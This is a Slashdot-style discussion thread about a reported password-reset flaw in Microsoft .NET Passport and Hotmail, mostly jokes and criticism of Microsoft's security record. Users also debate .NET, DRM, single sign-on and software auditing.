Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

Remember...

[stu_coates]

Remember folks, this is Trustworthy Computing! ;-)

Re:Remember...

according to a dutch news site this hole was fixed shortly after the posting... So thats the way to talk to microsoft.....

nu.nl for people knowing how to read dutch (no NOT german)..

Re:Remember...

[rf0]

I wouldn't trust them to feed my fish.

Rus

Re:Remember...

[ctellefsen]

It's a good thing that (according to M$ ads) that the hacker is an endangered species, so that there is noone around to exploit this exploit.

Current score: XBox is hacked, Passport is unsecure, SQL Server is beset by worms, and I won't even mention all the holes found over the years in IE and Outlook.

Welcome to the age of untrustworthy computing...

Re:Remember...

[Gortbusters.org]

That's one degree of difference with .NET!

Re:Remember...

[m00nun1t]

I fully agree this passport problem is a lame & unexcusable fault that should never, ever have happened.

However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

Re:Remember...

[jkrise]

" according to a dutch news site this hole was fixed shortly after the posting... "

If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.

Re:Remember...

[beuges]

So does that mean they can get away with ignoring bugs in software that can expose personal details and credit card numbers to anyone?

I think that if they were aware of the problem (and they were, apparently the finder mailed them 10 times), chose not to fix it, and some poor person had their credit card number exposed and abused, I think that Microsoft should be taken to the cleaners. Online security is something that must constantly be looked at, and maintained and updated. Its for their own good, really - if they don't fix it, they'll end up the dumbasses, cos people will lose their trust in the Passport system, and use other means for online transactions.

Re:Remember...

[jkrise]

Actually it's Microsoft Next Generation Secure Computing Passport.Net Services Platform (XML) .Net #++ (TM).

Re:Remember...

[mbourgon]

MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.

Re:Remember...

[prinzip]

Yeah but you seem to forget that hotmail is on windows Server 2003...

Re:Remember...

[m00nun1t]

No it doesn't mean they can get away with it. The part of my post that said "it's inexcusable" kinda hinted at that. My point is simply to not drag trustworthy computing into this, that's all.

Re:Remember...

[frankthechicken]

I don't know, this still seems to work.

Re:Remember...

[ConceptJunkie]

Why should Microsoft be "taken to the cleaners", when their EULA's state that any similarity between the software the sell and what they claim they are selling is purely coincidental.

See Microsoft has this liability thing all sewn up. All they have to do is "Just trust us." and then in the fine print it says "But if we screw up, you can't hold us responsible."

They want it both ways, and they seem to have gotten it.

Re:Remember...

[ConceptJunkie]

But where's the public outrage?

We on /. regularly vent our spleens (including me, and I'm a Microsoft user myself) about this blatantly bad situation, but Microsoft continues to prevail, and except for the occasional story, there really seems to be no negative impact on their business (much of which seems to be spinning their abysmal record in "trustworthiness").

Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

Re:Remember...

[plague3106]

Considering the security record of every product they ever made....why should we believe that 'trustworthy' computing will be any different? Because they said so? Please..

Re:Remember...

[beuges]

If a company has a system which contains personal and financial information of their clients, and that system has a bug, and the company chooses not to fix the bug, simply because they are focusing on new products, and not on fixing security flaws in their older products, which would end up having a potentially huge financial impact on the innocent users who are affected by that bug, then I would not trust that company with my personal information. I.e., I would deem that company to be untrustworthy.

A trustworthy system is one which the users trust. Trustworthiness and security go hand-in-hand. The fact that they ignored the bug-finder's 10 emails informing them of the vulnerability makes the public lose their trust in the company. Microsoft cannot claim to be trustworthy if their customer-/user-base does not trust them with their information.

Re:Remember...

[hpulley]

> Its for their own good, really - if they don't fix it, they'll end up the dumbasses, cos people will lose their trust in the Passport system, and use other means for online transactions.

What, you mean someone HAS trust in Passport? Wow...

Re:Remember...

[mark_lybarger]

just because mr gates has recently begun to use the term "trustworthy computing" to describe how they intend to build software systems is irrelevant to the OP. a software vendor that is aware of a security hold that can be exploited to harm the consumer MUST resolve that problem, and IMHO should issue a product recall the same as the manufacturer of a child safety seat, or a automobile, or any other goods and services provider. if you build something that's hazardous to the consumer under normal usage, you're reponsible to fix it (talk to firestone/ford).

so weather or not it will be termed trusty worthy computing or not, these issues MUST be fixed. for some reason, software vendors think they can put a simple "we're not responsible for anything" message in their license and absolve themselves from any damages caused by normal usage of their product. this is plain wrong.

Re:Remember...

[Reziac]

Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

Re:Remember...

[SEWilco]

When you are both .NET people, that is zero degrees of difference. The distance to zero degrees of difference is one URL.

Re:Remember...

[arkanes]

Server 2003 is supposedly the first product that benefited from the new processes and reviews that are part of the whole trustworthy computing. In it's favor, it's a vast improvement over past servers (ships locked down by default, rather than wide open). So I'll hold off judging thier new commitment to security until I see what 2003 looks like. In the meantime, I'll still bitch and complain about thier old, crappy commitment to security.

Re:Remember...

[kawika]

Why is this modded funny? It's insightful. Security is hard to measure quantitatively so there will be some degree of judgement involved. Good PR can help to influence your judgement. (Well, not the typical /. judgement of Microsoft but you know what I mean.)

Re:Remember...

[Black+Copter+Control]

. . . . But many UNIX vendors eventually cleaned up their act and started putting out secure systems, it is not impossible that microsoft could do the same. . . . .

Unix was insecure back when people were working on an assumption that 'the net' was a secure place where all the admins pretty much knew each other within 2 or 3 degrees of separation. The Great Morris worm of 1988 is generally considered the 'great wakeup call' for the unix community.

If Windows 2003 is the first MS product to benefit from their 'bourne again' focus on security, then this means it pretty much took 15 years for MS to 'realize' that security was a real issue worth addressing. Perhaps, in 5 years or so, they'll have caught up with the Unix community.
It looks to me like MS doesn't consider security a good idea on it's own terms. They consider security to be a marketing issue. It was only when security issues threatened their market dominance that they took it with any seriousness. If it ever ceases to be a marketing issue (i.e. if they ever manage to 'put Linux down'), then I expect that it will, once again, wane in their focus.

Re:Remember...

[iabervon]

Their EULA doesn't prevent you from suing them (in the US, you can't forfeit this right even intentionally); it just prevents you from winning. But really, winning such a lawsuit would be about as bad for Microsoft as losing. They don't really want it do to become a matter of precedent and public record that, when using Microsoft software, you are exposing yourself to huge risks with no protection. It's in the fine print, but it hasn't so far been in the national headlines. On the other hand, if Microsoft loses or settles such a suit, that's just money, and they have plenty of that.

Re:Remember...

[pod]

It's still a lame reason. Hotmail isn't a single point relase product. It won't be replaced with Hotmail 2003. What was the point of the security PR stunt if not to improve existing processes? And why would you say Hotmail and Passport won't benefit from the secure computing initiative?

Re:Remember...

[EvilTwinSkippy]

Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

I think the theory is, that by having so much low-hanging fruit, M$ is hoping that the next generation of hackers will be as complacent as the present user base.

Well, at least take the shine off of 0w#!n@ a system. It used to be a challenge. Now its just annoying.

Re:Remember...

[jpetts]

However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

The cynical amongst us would probably interpret this as yet another way of trying to force people to upgrade.

Re:Remember...

Yeah, whenever M$ does something, the magazines and message boards are FULL of angry posts from CxO's and folks who are upset.

Then after a while, it all dies down, and nobody switches to Linux or does anything else about it.

Why?

Because IT COSTS TOO MUCH TO SWITCH. I see it all the time. My boss HATES microsoft but can't pay to move all the apps to Linux, and can't force the clients to switch.

Microsoft can do ALMOST anything and the worst that happens is they shed a few small business customers.

AVOID LOCK IN! If you're starting a business, base it around Free software with a few Macs and Windows on the edge, it costs A LOT LESS to move from one free software vendor to the other.

Re:Remember...

[morleron]

Yet another security flaw from a company that is trumpeting its "dedication to security" in its marketing hype. What is it about MS that makes people think they'll ever get this sort of thing right? Not only do they have compromises in current products, but their on-the-drawing-board "Longhorn" project promises to be a tar pit of security issues.

MS needs to realize that making everything from file handling to Internet browsing an intrinsic part of an OS is not the way to achieve either security or stability. With OS architectures that resemble a bowl of spaghetti it's no wonder that the list of security problems continues to get longer every day. There is evidently no way that MS can remove, or even limit the effect of, the security problems that their products are subject to.

Before you MS apologists start pointing out that Open Source software has problems, too, I'll gladly stipulate that. However, there are several ways in which those problems differ from the ones that MS inflicts on Joe Average computer user. First, given the loosely coupled nature of UNIX/Linux a security problem in an application does not affect the operation of the OS itself. Even problems within the kernel itself are generally easy to fix as the OS doesn't try to do everything under the sun. Fixing those is much easier (and faster) than when a problem is part of a piece of an application that is part of something else, that is connected to the OS via a lot of tightly-wrapped code.

Also, the Open Source community has not, that I'm aware of, ever claimed that "security is job one." Instead, by releasing the code and allowing others to make changes and re-distribute the modified code, a lot of potential problems are taken care of early in the release cycles. In keeping with the philosophy that code should be available the Open Source community doesn't waste time denying the existence of problems or trying to cover them up. Instead, the problems are quickly fixed, the modified code is rapidly made available, and systems are patched, generally without having to schedule downtime as, for most fixes, the machines, be they desktop or server, don't need to be rebooted once the patch is applied. I dare say, that because of the "transparency" of the patch process, the average UNIX/Linux system is more current with patches than the average Windows machine. I don't have hard number for that, but my experience in mixed MS and UNIX/Linux shops gives me that impression.

The bottom line is that MS can keep its products as fas as I'm concerned. People, albeit slowly, seem to realizing that MS is not capable of producing software that is reliable, secure, and easy to patch when fixes are needed. I suspect that realization has a lot to do with the growing popularity of Linux and other Open Source OSes and products.

Just my $.02,
Ron

Oh my God (Mad scramble)

[LookSharp]

Ahhh! I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious

Re:Oh my God (Mad scramble)

[grarg]

No need. register.passport.net seems to be completely down at the moment; I guess MS copped on.

Re:Oh my God (Mad scramble)

I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

Don't bother, I just did it for you.

Re:Oh my God (Mad scramble)

[twelveinchbrain]

I know you're being sarcastic, but if I'm not mistaken, MSN subscribers also sign in with Passport. This would mean that anyone who happened to use MSN as their ISP can have their personal information stolen. It's not so unreasonable for a person to expect their private, personal emails to remain private.

Re:Oh my God (Mad scramble)

[kharchenko]

I remember reading notes of some poor fellow who was involved in trying to get MS to fix some hotmail backdoor a while ago. Even though he wasn't in any way responsible for finding the hack, years on end he received e-mails like this:

Dear Xxxx,
It's terribly important for me to hack into an account of Yyyy !
Please understand, she's my girlfriend, and I think she might be cheating on me.
Please tell me how to do this ... please, please ...

Now every time I read about another hotmail hack, I can't help but think how many ticklish revelations will happen today :)

Re:Oh my God (Mad scramble)

[Fishstick]

Taco tells this story in his journal

From: NAME DELETED
Subj:
rob,
i read that you know the web site address to view peoples mail in hotmail. i really think my
boyfriend is cheating on me, he is extremely secretive, especially about his e-mail. please please
can you give me the address to put my mind at ease.

As lame as it sounds...

...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....

404 error

[uberdood]

Er, already fixed. I get a 404 error when I go there (with appropriate e-mail addresses).

Re:404 error

[bailout911]

Yeah, but you can clearly see that it's not a "standard" 404 page generated by either IIS or apache. Viewing the page source reveals Microsoft's fix:

--Begin Page Source--

404 not found

--End Page Source--

That's right, not even a "real" 404, just a text file claiming to be a 404.

Re:404 error

[jlanng]

It returns an HTTP status of 404, so it is a proper 404

Re:404 error

[FinalCut]

It's amazing to me how quicky ignorance rears its ugly head when hate something.. what is the point of this post other than to show that you don't know what your talking about?

Security flaw in Passport!!!!

[grahamlee]

In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.

Re:Security flaw in Passport!!!!

[jkrise]

"the England cricket team haven't won anything"

I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?

Re:Security flaw in Passport!!!!

[rifter]

twice two is four

It seems you are overdue for your appointment at miniluv, thought criminal!

Re:Security flaw in Passport!!!!

[Xeleema]

Invader Zim Rocks!! (I know, I know. OT, but I couldn't resist)

Oh no, not again...

[girl_geek_antinomy]

The depressing thing is, it's such a simple exploit...

Oh dear. When are people going to start *thinking* before they add usability features to web services willy-nilly...? Hopefully at least the fact that this is so high-profile will make others think hard about their own password-resetting systems.

When I was working on an e-commerce site, I remember us all sitting around spending literally hours plotting out exactly what who would be able to do what with it. It's just commonsense, surely?

Re:Oh no, not again...

Microsoft hires only "geniuses", i.e., no common sense whatever!

Re:Oh no, not again...

[Twanfox]

Something on any programmer's mind when actually writing a program should be "How can I break this?"

Re:Oh no, not again...

[EvilTwinSkippy]

Hell, I wrote a website for a volunteer organization with more security than that in my spare time!

I have a Kerberos-like session management system. After authentication, the browser gets a cookie with its authorization ticket. The ticket is surrendered every page view, and validated against a database of open sessions.

No session, expired session, illegal session, go back to the login page. The whole thing is 7000 lines of code in TCL, including my SQL library routines.

Think: someone we paid to develope M$'s system.

Re:Oh no, not again...

[epsalon]

I found a similar exploit on a local Health Care Provider website. On one hand, they used Verisign digital certificates for patients on strong-encrypted SSL, but on the other hand failed to check that an ID number submitted by a hidden field in a form to get medical results (sensitive medical data) is the same one in the digital certificate. So, one could easily see any patient's medical results, even if they were not registered for the internet service at all!

A legitimate use?

[Gleeb]

Thank the lord for POP ;)

Re:A legitimate use?

[Bendy+Chief]

Indeed. I just recently fully migrated from my abominable Hotmail address to my POP3. I can't believe how bad Hotmail's gotten, between popups, appending service ads to your outgoing mail, changing their login screen to be full of (guess what) ads, and not letting you correctly apply your own spam filters.

No indeedy! If I want to redirect mail with my own filters, I can't actually send it to the size-unrestricted Junk Mail folder!

Re:A legitimate use?

[pldms]

Indeed. I just recently fully migrated from my abominable Hotmail address to my POP3. I can't believe how bad Hotmail's gotten, between popups, appending service ads to your outgoing mail, changing their login screen to be full of (guess what) ads, and not letting you correctly apply your own spam filters.

Agreed. I've been a hotmail user since the pre-Microsoft days, but now use another account. However you can forward mail easily using Gotmail if you want to keep an eye on it.

Re:A legitimate use?

[Bendy+Chief]

Thank you kindly, sirrah, from another pre-MS Hotmail user who's cried at their meteoric fall from grace. ;)

The Microsoft Information Minster Says:

[retards]

We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!

Re:The Microsoft Information Minster Says:

[retards]

What's an AC?

Thanx, anyway!

Re:The Microsoft Information Minster Says:

[Amarok.Org]

I believe nothing you say without a triple-guarantee!

Re:The Microsoft Information Minster Says:

[Lairdsville]

Apparently, the only answer Muhammad Faisal Rauf Danka got after multiple unsuccessful attempts to contact Microsoft was:

"Bugs? There are no bugs. We have destroyed two bugs, two anomalies, and a misspelling. We have driven them back. I guarantee you, there are no bugs in our software. Those who say there are bugs, (dramatic pause) THEY are the bugs. All they tell is lies, lies, and more lies! - Thank you for calling Microsoft support. (click)"

(as sent by Richard Berry to welovetheiraqiinformationminister http://64.39.15.171/index.html#quotes)

Re:The Microsoft Information Minster Says:

[FuzzyBad-Mofo]

Penguins aren't Donkeys, stop messing with my mind!

now be fair

[Joe+the+Lesser]

unsuccessful attempts to contact Microsoft.

It's not their fault Outlook kept crashing, right?

Re:now be fair

[jkrise]

"It's not their fault Outlook kept crashing, right?"

Nope... actually support@hotmail.com was taken over by rms-gnu@hotmail.com
The GNU team folks are promising a fix faster than MS, provided they can make the entire code GPL!

Re:now be fair

[deranged+unix+nut]

This *really* makes me wonder how they attempted to contact Microsoft.

Re:now be fair

[Fulcrum+of+Evil]

The GNU team folks are promising a fix faster than MS, provided they can make the entire code GPL!

Hey, that's fine. Only problem is that, since they never distribute the product (it's a service), they're under no obligation to pass around the source.

Ruh Roh Raggy

[Ralph+Wiggam]

Holy Crap!

If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

With .NET, there's only one degree of seperation between me and evil crackers.

-B

Re:Ruh Roh Raggy

[archen]

If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...

Re:Ruh Roh Raggy

[tanveer1979]

If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

Wow that would be bad, after all you must be a real miracle since you got both! ;-)

Re:Ruh Roh Raggy

[darkov]

If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

Using said exploit I can now reveal your secrets:

To have larger breasts: eat lots of fatty food.
To make your penis larger: look at heaps of flithy porn.

I have tested these and they work.

Re:Ruh Roh Raggy

[phorm]

A lot of programmers have both. You try sucking down twinkies and jolt all day and see if you don't start developing breasts to go along with that spare tired around your waist...

Re:Ruh Roh Raggy

[floydigus]

Plenty of people exist with both. No miracle, just unusual.

good

[Nevrar]

"...the victim's accounts..."

It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

Oh no

[Rik+Sweeney]

A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

But that spam is personal to me. It's not for anyone else.

Can someone explain this?

[jkrise]

"A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. "

I fail to u'stand what Microsoft .NET Passport means. I only know Hotmail said:
In 1999: Login to Hotmail
In 2000: Login to Passport
2001 and later: Login to .Net

Nobody seems to know what the hell .Net is all about (including MS). Visual Studio .Net is the only branded .Net product out there, and Hotmail is supposed to be on .Net, whatever that means.

Is Passport or Passport.Net used by any other service except Hotmail? Terribly confusing.

Re:Can someone explain this?

I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !

Re:Can someone explain this?

Nobody seems to know what the hell .Net is all about (including MS).

Lots of people understand what it's about. I use it every single day. Perhaps what you mean is that you don't understand what it's about. In that case, go to http://www.microsoft.com/net/ and look around.

Re:Can someone explain this?

[Kredal]

So if I start the .ORG service, can I kill the .NET system?

So who wants to join the .ORG at my place next friday? (:

Re:Can someone explain this?

[Schnapple]

I'm going to use this opportunity to blatantly plug an article I wrote on this topic on what .NET is and what .NET isn't. And yes that's a Tripod link, so turn on your popup blockers.

But the short answer to your question is that yes, the overkill of .NET branding has muddied and confused the perception of what .NET is. But hey, everyone in the world knows the name, so mission accomplished?

Re:Can someone explain this?

[LordKronos]

So who wants to join the .ORG at my place next friday
You'll probably get more takers with a .ORGY

Re:Can someone explain this?

[weave]

Yeah, ok, I went there, read it, still confused. Sounds like it'd be more easier to define what .NET is .NOT than what it .IS

It's about as clear as going to a biology/chemistry lecture and not understanding a thing. Yeah, I'm sure they all know what an RNA is, but I'm lost and don't care.

So why should I care about .NET either?

Re:Can someone explain this?

[jkrise]

"I use it every single day."
You mean, you use Hotmail?

After reading your referenced site, I've come to the conclusion:
The Benfit of .Net is XML
and
XML can be done without .Net.

If anything, I'm more confused.

Thanks for a very instructive link.

Re:Can someone explain this?

[jkrise]

"the overkill of .NET branding has muddied and confused the perception of what .NET is."

And yet you've written a thousand words to reach the same conclusion! Brilliant!!

"But hey, everyone in the world knows the name, so mission accomplished?"

You mean, the mission was to confuse everyone in the world, including Microsoft? Well, you can be sure that's accomplished a long ago, with Service Packs.

Re:Can someone explain this?

[Schnapple]

And yet you've written a thousand words to reach the same conclusion! Brilliant!!

Actually the thousand words cover more than that. The conclusion I wrote there merely covers the first few paragraphs.

You mean, the mission was to confuse everyone in the world, including Microsoft?

The mission was name brand recognition, which to marketing gurus is the most important thing in the world.

Witness how Infogrames yesterday changed their name to Atari. Sit back and watch how many people will now think that Atari is the exact same company that made the 2600. Heck, when Hasbro made Atari branded games I worked in a software store and people would ask us if they needed "their old Atari" to play these new CD-ROM games.

Your average person probably thinks J2EE is an engineering agency, but if they use Hotmail they think that they use .NET every day. Microsoft learned long ago that there's no such thing as bad publicity - mission accomplished.

Re:Can someone explain this?

[TheOneEyedMan]

As I understand it, .Net is a XML based communication platform for connecting just about any device you can imagine. For now, that is mostly desktops and servers, but later phones, fridges, and TVs.
To the user it looks like nothing, which is why you probably do not know what it is. To the programmer, it looks like a set of libraries. To the hardware manufactures, it looks like a formatted data stream.

Re:Can someone explain this?

[penguinrenegade]

YES - eBay uses .net passport to log in. It's the only one I know of, but it DOES exist. Someone could ruin your eBay rating you worked a LONG time to get if they could get into your .net passport. Just a thought.

Re:Can someone explain this?

[Reziac]

Will ORG be written in ASM??

Re:Can someone explain this?

[geniusj]

.NET is mainly a bytecode interpreter (virtual machine). However, multiple languages (mostly Microsoft languages) can be compiled into that bytecode, meaning that you can take portions of code written in VB and 'integrate' it with code you've written in C# or Visual C++. That's how it's supposed to work anyway. It's not a terrible idea, but apparently the VM doesn't fit well for all languages. For an open source version of this, look to Parrot ( http://www.parrotcode.org ). I have high hopes for it.. I think .NET might be used by MS in other meanings as well, but I think this is the main component.

Cheers,
-JD-

Re:Can someone explain this?

[FuzzyBad-Mofo]

Obviously, you think that you know what .NET's all about. But do you really? I know about Visual Studio.NET, but that's not the whole story here. Is .NET any more than a marketing scheme? Why don't you enlighten us?

Re:Can someone explain this?

[indiigo]

Don't forget .net the programming platform. .net the server platform. .net hailstorm .net the often changed philosophy over the last 4 years at MS. Anyone outside MS explain this completely I'll give you a cookie. .net the tld domain ...

Re:Can someone explain this?

[Theaetetus]

Too late - look at the logo. They're already the .bORG
;)

-T

Re:Can someone explain this?

[jpetts]

So if I start the .ORG service, can I kill the .NET system?

Only if you program in ASM

Re:Can someone explain this?

[theCoder]

I don't know a lot about .NET, but from what I've heard, you're describing the CLR. The only thing I don't really get about that idea is that it doesn't seem to bring anything new to the computing table. We already have something that runs applications in different languages. If fact we have several of them. They're called 'x86' and 'ppc' and 'sparc' and 'mips' and so on.

Also, I think you can compile some other languages like python to run under a JVM. And (in theory) there are JVMs for many different platforms.

I guess I'm just missing what the point of the .NET CLR is. I know it's not very MS, but it seems it would have been easier to integrate into using a JVM somehow. Though I suppose Sun's idiot lawyers probably would have killed that.

(I also hope the idiot who went around slapping .NET on the end of every MS product was fired. That alone probably made .NET harder to figure out since everything is .NET and thus it means about as much as a version number to most people)

Re:Can someone explain this?

[Old+Wolf]

Well, the court found that MS wasn't allowed to make a JVM because Sun didn't want them to any more. So they made .NET instead.

Re:Can someone explain this?

[sjames]

.NET is a buzzword compliant rewrite of rpc combined with an even more buzzword complient rehash of java which, itself, is a buzzword compliant rehash or P-code in combintion with obsessive-compulsive OOP, nothing more. The various promises it makes are based on a great deal of hand waving which 'just happens' to tie everything to Windows.

Nice going, MS.

[Renraku]

Too bad this was caused by a blatant underestimation of the power of curious users. If I had ever used the feature, I would have picked it up instantly.

Re:Nice going, MS.

[pod]

Yup, looks like the reset utility picks up your back-up email address from your Hotmail/Passport profile, sticks it in a URL, redirects you to it, and hopes you don't notice the email address flying by on the address bar. That's a brilliant piece of web app coding right there.

I sure hope their .net example code snippets followed some sort of secure computing initiative thingy guideline...

Re:FUD

[girl_geek_antinomy]

Instead if you're a legitimate user who's forgotten their password you're now f*cked. *sigh*. Nice to know things have improved then...

Finally...

[rf0]

All those l33t hax0r can now stop asking how to hack hotmail. The answers right here (if it wasn't 404'd)

Rus

Yes!!

[marcushnk]

Go the trustworthy computing!

Well, at least now I know...

[johannesg]

...where I don't want to go today.

Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...

Really tough fix

[alteridem]

Sounds like a really tough fix... Delete the offending page... "There, see, its secure."

This should encourage anti-DRM folks

[hrbrmstr]

While most geeks take at least some "delight" in vulnerabilities (even outside M$ vulnerabilities), the fact that we keep seeing stupid programmer tricks from M$ employees should be a comforting factor to DRM detractors. Even if M$ manages to get DRM out there, how riddled with holes will it be? If it is constantly circumvented, does anyone think suppliers will use it (DMCA-type laws notwithstanding)?

And with this being a web-"exploit", it makes the DRM-circumvention idea more interesting since all of the verification will be done online.

Constant vulnerabilities == no real DRM.

Re:This should encourage anti-DRM folks

[Bob9113]

Even if M$ manages to get DRM out there, how riddled with holes will it be?

The problem is not whether it works - we all know that DRM is technically impossible (analog hole). The problem is that combined with the DMCA, DRM makes fair use illegal. If Passport were being used for copyright protection, it would be a federal crime to report this security vulnerability.

Re:This should encourage anti-DRM folks

[Ender+Ryan]

Not to mention, DRM will make life a PITA for many people some of the time, and for some people(probably a lot of /.ers) all the time.

Actually, it's a PITA already. Sometimes I receive "encrypted"(usually by some knucklehead not understanding what he's doing) pdf files that I need to do stuff with... That's just one example. It isn't infrequent that I must violate the DMCA in order to do my job. They're little things, things that noone would think are violations, but by the letter of the law they certainly are.

<censored>
ranting and raving about the DMCA, DRM, RIAA, MPAA, dirty politicians, U.S. Congress(oops, that's a dupe), etc.
</censored>

Re:This should encourage anti-DRM folks

[hrbrmstr]

That's a really good point. I keep trying to make a mental note every time something like this comes up - that is, every time one could say "doing XYZ would be violating the DMCA". I overlooked that in this case.

It'd be a cool if there were a site that did that kind of tracking. An open (moderated) blog whose sole purpose was to document what would be "illegal" as it comes up. It might be an eye-opener to the folks making and signing the laws.

But, I digress. Back on track, in summation: good post Bob9113.

Re:This should encourage anti-DRM folks

[Reziac]

Not only that, but it can swing the other way and worst case, delete all your legit files -- quite by accident, due to poor programming.

For anyone who doesn't think so... witness Tripod's draconian "anti-abuse" script: Took us a while to figure out why it was killing some perfectly legit sites, but here it is: When they run it, it deletes any website that has ANY unlinked binary file, even if that's something as simple and innocent as an orphaned GIF. It was designed to get rid of warez repositories, but took the concept a bit too far to say the least.

Re:This should encourage anti-DRM folks

[TheLink]

The other problem is when the Judge, Court and Jury are all brainwashed to believe it works (Trustworthy Computing and all that BS), and you have to convince them it was broken and it wasn't you that did it.

Re:FUD

[markov_chain]

Sure, *this one* is fixed, but it sure doesn't inspire confidence in the security of their service. Who knows if there are other holes left for crackers to exploit...

Palladium/NGSCB

[leomekenkamp]

If those guys at Microsoft keep up their abismal record of 'security', there will be no point whatsoever in Palladium/NGSCB/NewCoolMSName/whatever keeping a computer 'trusted'; when a 'trusted' part of the system has a hole as big as this hotmail flaw, that leaves the whole system wide open.

Does the XBox BIOS accept URLs of some sort?

boot://localhost/bootmrg.sys?lc=1033&id=&boot=li lo

Jokes aside...

[ParnBR]

Sooner or later they'll start blaming users for providing personal information, and excusing websites and companies from security flaws.

Microsoft .NET Passport Passwords.. :-)

[jkrise]

Repeat this rapidly ten times, and watch your tongue get locked faster than Windows XP!!

Whoever has got...

[archetypeone]

victim@hotmail.com or attacker@attacker.com is going to be really pissed...

Re:Whoever has got...

[AVee]

Don't worry

# host attacker.com ;; connection timed out; no servers could be reached

Re:Whoever has got...

[caluml]

attacker.com has probably just drowned under a sea of emails....

What do people expect?

You expect security from a company with one of the worst track records in the industry? Ha!
The problem with Microsoft (and the majority of other IT firms) is that there is no PROACTIVE auditing. I think that every company should conduct OpenBSD-style code audits before they release software. This would cut down dramatically on the number of incidents like this.

Re:What do people expect?

[PerryMason]

The problem with proactive auditing is that it takes time, and as well know, time is money. Personally I think its harsh to put the blame on the coders as I've been involved in alpha and beta testing quite a few apps over the years and almost without exception, the bean counters force the release of a product before the coders are happy with it.

Typically the bean counters want the cash rolling in as soon as possible on a new product (as they've seen nothing but a cash outflow) and in the software industry, they know that bugs are both inevitable, and unfortunately, for the most part, accepted so they're happy to release an incomplete product knowing that it won't stop people buying it. We won't see substantially bug-free code until software developers are held to the same standards of product reliability that we see in just about every other industry. Until then, there really isn't any reason to thoroughly audit your code. Just release it buggy as all hell and release Service Packs and Hotfixes. It works for the biggest software company on earth, so why shouldn't it for anyone else?

Re:What do people expect?

[leomekenkamp]

The problem with proactive auditing is that it takes time, and as well know, time is money.

Such a pity that Microsoft is almost out of cash...

Re:What do people expect?

[conteXXt]

Audit?

Why audit when you can CHARGE for fixes?

Why audit when you will be releasing a new version (at a cost) every 2 years?

Why audit at all unless your product is free and has a lifecycle longer than it's bug list?

(Why? Ask Theo, he'll tell you)

Re:What do people expect?

[JimDabell]

The problem with proactive auditing is that it takes time, and as well know, time is money.

15 months ago, Microsoft announced they were spending a whole month on nothing but security - code audits, developer training, you name it. They announced they were focussing much more on security issues.

This is after they have slowly built up a reputation as being incapable of writing anything securely. If there's one thing Microsoft has had an abundance of, it's time and money.

Personally I think its harsh to put the blame on the coders as I've been involved in alpha and beta testing quite a few apps over the years and almost without exception, the bean counters force the release of a product before the coders are happy with it.

Yes and no. Things like buffer overflows shouldn't even make it out of the office - it indicates a lack of training and coding standards. Other issues are often the result of bad development process, including, as you mention, premature release.

Re:What do people expect?

[wgmari]

While I don't disagree with you in general, there are some sections of software programming that do not allow software to be released without extensive testing. Would you like the software that's controlling that Boeing 777 you're a passenger on to have a patch announced that fixes a "critical landing bug" while up in the air? I doubt it.

The problem is that not all software is held up to these standards. And why? As you wrote, time and money. It takes far longer and costs far more to develop software when you have lives depending on the quality of the program. You can't bug-fix someone back to life.

I am a software developer, and while there are no lives at risk if my code stuffs up, I can tell you that I take it personally if there is a problem in anything that I release. Why should my clients expect anything less?

Flawed concept

[YrWrstNtmr]

And eventually, we will see a similar exploit on Sun's Liberty system as well.

The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

Re:Flawed concept

[Zathrus]

And eventually, we will see a similar exploit on Sun's Liberty system as well.

While we will undoubtably see exploits on any system large enough to atract interest, I don't think Sun would code something this brain-dead stupid.

The industry standard is to ask for a passphrase when you forget your password. MS didn't even do this. I'm still wondering what junior level coder came up with this one though... I can't even express how stupid this is.

The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

So we work to make it better... abandoning the concept entirely isn't going to happen. It's a worthwhile concept IMO, and while there's a lot of issues to be worked out that's not to say that they can't be. Most people would be willing to use a "strong" password if they only had to remember one. When you have to remember a dozen then forget it - the vast majority of people are going to use something like "password" or an easily guessable word from their personal life. Remembering "df783N:pa04uYG" and another dozen variants just isn't going to happen.

Re:Flawed concept

[trix_e]

actually I think this is an example of flawed *reasoning*. Painting all SSO solutions with such a wide brush is misinformed at best, and irresponsible at worst.

